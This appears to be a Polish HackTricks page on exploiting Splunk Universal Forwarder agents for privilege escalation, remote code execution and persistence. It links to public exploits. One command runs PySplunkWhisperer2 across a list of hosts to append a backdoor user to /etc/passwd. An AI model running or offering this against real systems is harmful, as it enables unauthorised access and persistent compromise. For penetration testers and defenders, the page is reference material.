Splunk LPE and Persistence

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

Jeśli enumerując maszynę wewnętrznie lub zewnętrznie znajdziesz uruchomiony Splunk (port 8090), jeśli masz szczęście i znasz jakieś ważne dane logowania, możesz wykorzystać usługę Splunk do wykonania powłoki jako użytkownik uruchamiający Splunk. Jeśli uruchamia go root, możesz podnieść uprawnienia do roota.

Jeśli jesteś już rootem i usługa Splunk nie nasłuchuje tylko na localhost, możesz ukraść plik hasła z usługi Splunk i złamać hasła lub dodać nowe dane logowania. I utrzymać trwałość na hoście.

Na pierwszym obrazku poniżej możesz zobaczyć, jak wygląda strona internetowa Splunkd.

Podsumowanie Eksploatacji Agenta Splunk Universal Forwarder

Aby uzyskać więcej szczegółów, sprawdź post https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/. To tylko podsumowanie:

Przegląd Eksploatacji: Eksploatacja celująca w Agenta Splunk Universal Forwarder (UF) pozwala atakującym z hasłem agenta na wykonywanie dowolnego kodu na systemach uruchamiających agenta, co potencjalnie może skompromitować całą sieć.

Kluczowe Punkty:

Agent UF nie weryfikuje przychodzących połączeń ani autentyczności kodu, co czyni go podatnym na nieautoryzowane wykonanie kodu.
Powszechne metody pozyskiwania haseł obejmują ich lokalizację w katalogach sieciowych, udostępnionych plikach lub dokumentacji wewnętrznej.
Udana eksploatacja może prowadzić do dostępu na poziomie SYSTEM lub roota na skompromitowanych hostach, wycieków danych i dalszej infiltracji sieci.

Wykonanie Eksploatacji:

Atakujący uzyskuje hasło agenta UF.
Wykorzystuje API Splunk do wysyłania poleceń lub skryptów do agentów.
Możliwe działania obejmują ekstrakcję plików, manipulację kontami użytkowników i kompromitację systemu.

Wpływ:

Pełna kompromitacja sieci z uprawnieniami SYSTEM/root na każdym hoście.
Potencjalna możliwość wyłączenia logowania w celu uniknięcia wykrycia.
Instalacja backdoorów lub ransomware.

Przykładowe Polecenie do Eksploatacji:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

Użyteczne publiczne exploity:

https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
https://www.exploit-db.com/exploits/46238
https://www.exploit-db.com/exploits/46487

Wykorzystywanie zapytań Splunk

Aby uzyskać więcej szczegółów, sprawdź post https://blog.hrncirik.net/cve-2023-46214-analysis

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na GitHubie.

PreviousSocket Command Injection NextSSH Forward Agent exploitation

Last updated 1 month ago